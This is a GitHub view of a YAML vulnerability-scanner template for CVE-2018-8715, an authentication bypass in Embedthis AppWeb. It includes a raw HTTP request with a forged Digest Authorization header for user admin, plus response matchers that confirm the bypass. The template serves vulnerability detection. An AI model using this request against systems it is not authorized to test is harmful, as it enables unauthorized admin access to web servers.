forked from cckuailong/reapoc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-8715.yaml
33 lines (29 loc) · 968 Bytes
/
CVE-2018-8715.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
id: CVE-2018-8715
info:
name: AppWeb Authentication Bypass vulnerability
author: milo2012
severity: high
description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types.
tags: cve,cve2018,appweb,auth-bypass
reference:
- https://github.com/embedthis/appweb/issues/610
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
cve-id: CVE-2018-8715
cwe-id: CWE-287
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Digest username=admin
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<a class="logo" href="https://embedthis.com/"> </a>'
part: body